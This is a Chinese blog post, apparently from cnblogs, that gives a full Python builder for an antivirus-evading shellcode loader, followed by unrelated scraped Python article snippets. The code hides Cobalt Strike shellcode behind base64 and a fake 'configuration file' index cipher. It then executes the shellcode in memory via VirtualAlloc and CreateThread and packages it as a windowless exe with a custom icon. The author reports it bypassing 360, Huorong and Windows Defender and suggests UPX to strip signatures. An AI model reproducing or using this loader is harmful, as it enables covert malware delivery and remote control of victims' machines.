python过杀软新

利用python加载shellcode过360、火绒等杀软

先上代码

将以下代码保存到 mt.py

import base64
import os
import shutil

buf = b"这里替换shellcode"
b64buf = base64.b64encode(buf)
lzsds = """
import ctypes
import base64

shellcode= base64.b64decode(\""""+b64buf.decode()+"""\")
shellcode= bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype= ctypes.c_uint64
ptr= ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf= (ctypes.c_char *len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
   ctypes.c_uint64(ptr),
   buf,
   ctypes.c_int(len(shellcode))
)
handle= ctypes.windll.kernel32.CreateThread(
   ctypes.c_int(0),
   ctypes.c_int(0),
   ctypes.c_uint64(ptr),
   ctypes.c_int(0),
   ctypes.c_int(0),
   ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
"""
def arraydecode(rr):
    list_char = "This is a configuration file please do not delete,=configuration No 'bjABkmpxyz-RSUOPQVEFGHIJKLMWXYZ_3102qvw485CD967=)"
    # 数组加密
    index_b = []
    for i in str(rr):
        index_a = list_char.index(str(i))
        index_b.append(index_a)
    return index_b

ba64lzsds = base64.b64encode(lzsds.encode("utf-8")).decode()
sdata = arraydecode(ba64lzsds)

#打包
with open("note.py",'w',encoding="utf-8") as f:
    f.write("""import base64
import ctypes
import os
"""+"\n")
    f.write("data = "+str(sdata)+"\n")
    f.write("""def j(index_b):
    list_char = "This is a configuration file please do not delete,=configuration No 'bjABkmpxyz-RSUOPQVEFGHIJKLMWXYZ_3102qvw485CD967=)"
    index_c = ""
    for i in index_b:
        index_c += list_char[i]
    return index_c
data_j = j(data)
code = base64.b64decode(data_j).decode('utf-8')
exec(code)
""")


import PyInstaller.__main__
try:
    # 获取要打包的脚本路径
    script_file = "note.py"
    # 获取 PyInstaller 路径
    pyinstaller_path = os.path.dirname(PyInstaller.__main__.__file__)
    # 设置打包选项
    build_args = [
        "-F",  # 生成一个单独的可执行文件
        "-w",  # 不显示命令行窗口
        "-i=1.ico",  # ico
        script_file  # 添加要打包的脚本路径
    ]
    # 执行打包命令
    PyInstaller.__main__.run(build_args)
except:
    print("exe在dist文件夹内")

shutil.rmtree("build")
shutil.rmtree("__pycache__")
os.remove("note.spec")
os.remove("note.py")

如何使用

1、使用cs生成python的payload替换掉mt.py代码中shellcode

2、准备一个ico图标，放在和mt.py同一目录命名为1.ico，这点可以自行修改。

一键生成

替换掉代码里的shellcode之后，直接运行

python 文件名.py

动态上线-成功

复制到我的另一台电脑，开启360核晶和windwos defender

复制过去，无检测拦截

双击运行，360无拦截成功上线，火绒也能过

主动查杀-成功

有时候会检测到存在python的特征会报毒，但是运行不影响上线，可以使用upx进行压缩，去除python的特征

upx下载地址 https://github.com/upx/upx

压缩命令
upx -d note.exe

标签：index,python,一键,int,ctypes,import,shellcode
From： https://www.cnblogs.com/mt0u/p/17693992.html

用python爬取天气
之前做过这么个小网站，能够爬取天气，然后感觉没什么用，有上网站的时间用手机都看完了，然后就寻思能不能发到自己微信或者qq或者邮箱里先写下怎么把数据提出来 importrequestsimportjsonurl=你自己的网址result=requests.get(url)#print(result.text)data=json.loads......
python读写xlsx文件
importosimporttracebackfromopenpyxlimport*fromlogs.loginimportlogginfromopenpyxl.reader.excelimportload_workbookclassread_data_calss:file_name=r'../../Data/data.xlsx'#在当前路劲执行video_list=[]try:'&......
python读取yml文件
classRead_data_class:defread_yml_def(self,dir_path):withopen(dir_path,'r',encoding='utf-8')asf:yaml_list=yaml.safe_load(f)returnyaml_listifname=='main':passclassmain():path=os.pa......
Python——15days
双层语法糖三层语法糖（多层）装饰器的修复技术（了解）有参装饰器*装饰器的写法：自上而下执行：自下而上双层：@login_auth@outer执行顺先先执行outer——被装饰名字作为参数传入outer里，get_time=outer(index)。通过调用返回值（前提是如果有双层及以上装饰器......
Python工具箱系列(四十二)
RAR文件操作RAR是广受好评，使用广泛的压缩格式，开发者为尤金·罗谢尔（俄语：ЕвгенийЛазаревичРошал，拉丁转写：YevgenyLazarevichRoshal），RAR的全名是“RoshalARchive”，即“罗谢尔的归档”之意。尤其是winrar一度成为windows上的必备软件。它的特点如下：......
# yyds干货盘点 # Python判断多个文件夹的文件夹名是否包含“分公司”或“营销中心”
大家好，我是皮皮。一、前言前几天在Python最强王者群【哎呦喂是豆子～】问了一个Python自动化办公的问题，一起来看看吧。大佬们请问下判断多个文件夹的文件夹名是否包含“分公司”或“营销中心” 有没有什么简便的办法可以实现呀？二、实现过程这里【东哥】给了两个示例代码，实现......
Python工具箱系列(四十二)
RAR文件操作RAR是广受好评，使用广泛的压缩格式，开发者为尤金·罗谢尔（俄语：ЕвгенийЛазаревичРошал，拉丁转写：YevgenyLazarevichRoshal），RAR的全名是“RoshalARchive”，即“罗谢尔的归档”之意。尤其是winrar一度成为windows上的必备软件。它的特点如下：◆RAR通常......
Python判断多个文件夹的文件夹名是否包含“分公司”或“营销中心”怎么处理？（方法二）
大家好，我是皮皮。一、前言前几天在Python最强王者群【哎呦喂是豆子～】问了一个Python自动化办公的问题，一起来看看吧。大佬们请问下判断多个文件夹的文件夹名是否包含“分公司”或“营销中心” 有没有什么简便的办法可以实现呀？二、实现过程这里【东哥】给了两个示例代......
python开发之个微的二次开发
简要描述：发送链接请求URL：http://域名地址/sendUrl请求方式：POST请求头Headers：Content-Type：application/jsonAuthorization：login接口返回参数：参数名必选类型说明wId是string登录实例标识wcId是string接收人微信id/群idtitle是string标题url是string链接description是string描述thumbU......
解决Python中的包管理与依赖问题代码实操
Python的包管理与依赖问题是一个常见的挑战，但通过以下具体的解决方案和步骤，你可以更好地处理和管理项目中的依赖关系，提高开发效率。1.使用虚拟环境进行包管理步骤：a.安装虚拟环境工具，比如venv或者virtualenv。在命令行中输入以下命令安装venv:```$python3-mvenvmyenv```b.创建虚......

python一键过杀软